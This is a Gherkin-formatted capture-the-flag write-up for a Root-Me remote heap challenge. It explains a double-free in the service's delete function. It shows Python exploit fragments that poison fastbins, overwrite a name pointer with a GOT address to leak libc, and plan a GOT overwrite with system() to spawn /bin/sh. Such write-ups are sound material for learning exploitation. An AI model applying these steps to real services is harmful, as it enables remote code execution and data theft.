## Version 2.0
## language: en

Feature: elf-x64-remote-heap-buffer-overflow-fastbin-rootme
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    Get shell and read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 16.04     |
    | GDB-pwndbg      | 1.1.0     |
  Machine information:
    Given I am accesing the challenge through its URL
    When I visit the link
    Then I see a description with the following sentence "2 be free"
    And a statement
    """
    Exploit this network service to retrieve the file .passwd.
    """
    Then a program source code is delivered

  Scenario: Sucess:Finding the vulnerability in the source code
    Given the source code is delivered
    And due to the name of the challenge and the information given
    Then I can assume this is a double free vulnerability
    And that I take advantage of in fastbin containers
    Then looking a little bit at the code
    And I observe a function called "delete"
    """
    void delete(int i) {
      free(directory[i]->name);
      free(directory[i]);
    }
    """
    And a case operation tied to that function
    """
    case 2 :
      j = choice(0, MAX_ENTRIES-1, "Entry to delete: ");
      delete(j);
      slots[j] = 0;
      break;
    """
    Then I noticed that it doesn't check if directory's pointer has been freed
    And this allows trigger a double free

  Scenario: Sucess:Exploiting the vulnerability
    Given I recognize the vulnerability
    And according to the "entry" structure
    And the possibility of creating chunks of arbitrary size
    """
    5  struct entry {
    6    int age;
    7    char *name;
    8  };
    ...
    25  e->name = malloc(strlen(name));
    ...
    """
    Then the idea is to assign multiple fastbin chunks, exploit the double free
    And thanks to GDB-pwndbg I can see what is the double pointer
    And the slot position to leak
    """
    pwndbg> x/gx &directory
    0x6020c0 <directory>: 0x00000000020d82c0
    pwndbg>
    0x6020c8 <directory+8>: 0x00000000020d8320
    pwndbg>
    0x6020d0 <directory+16>:  0x00000000020d8320
    pwndbg>
    0x6020d8 <directory+24>:  0x0000000000000000
    pwndbg>
    0x6020e0 <directory+32>:  0x0000000000000000
    pwndbg> x/wx &slots
    0x604000 <slots>: 0x00000001
    pwndbg>
    0x604004 <slots+4>: 0x00000001
    pwndbg>
    0x604008 <slots+8>: 0x00000000
    pwndbg>
    0x60400c <slots+12>:  0x00000000
    pwndbg>
    0x604010 <slots+16>:  0x00000000
    pwndbg>
    """
    Then accommodate the assignments to corrupt the name pointer
    And thus leak glibc
    Then once that is done, overwrite some GOT's function with "system"
    And execute "/bin/sh"
  Scenario: Sucess:Preparing the exploit
    Given I know what to do, it only remains to prepare the exploit
    Then the first thing is to trigger the double free
    """
    new_entry(c, b'A' * 56, b'1337')
    new_entry(c, b'B' * 56, b'1337')
    new_entry(c, b'C' * 56, b'1337')

    delete_entry(c, b'1')
    delete_entry(c, b'0')
    delete_entry(c, b'1')

    new_entry(c, b'D' * 50, b'1337')

    delete_entry(c, b'1')
    delete_entry(c, b'2')
    """
    And with this section of code I get to exploit the double free
    Then the idea is to use the name pointer, overrwrite it with a GOT pointer
    And thus leak GLIBC
    """
    new_entry(c, b'E' * 8 + b'\x78\x20\x60', b'1337')

    ret = show_all(c)
    leak = struct.unpack("<Q", ret.ljust(8, b'\x00'))[0]
    libc = leak - 0x0000000000040730
    system = libc + 0x000000000004f4e0

    print("libc @ " + hex(libc))
    print("system() @ " + hex(system))
    """
    Then just change the argument of the overwritten function with "/bin/sh"
    And voila
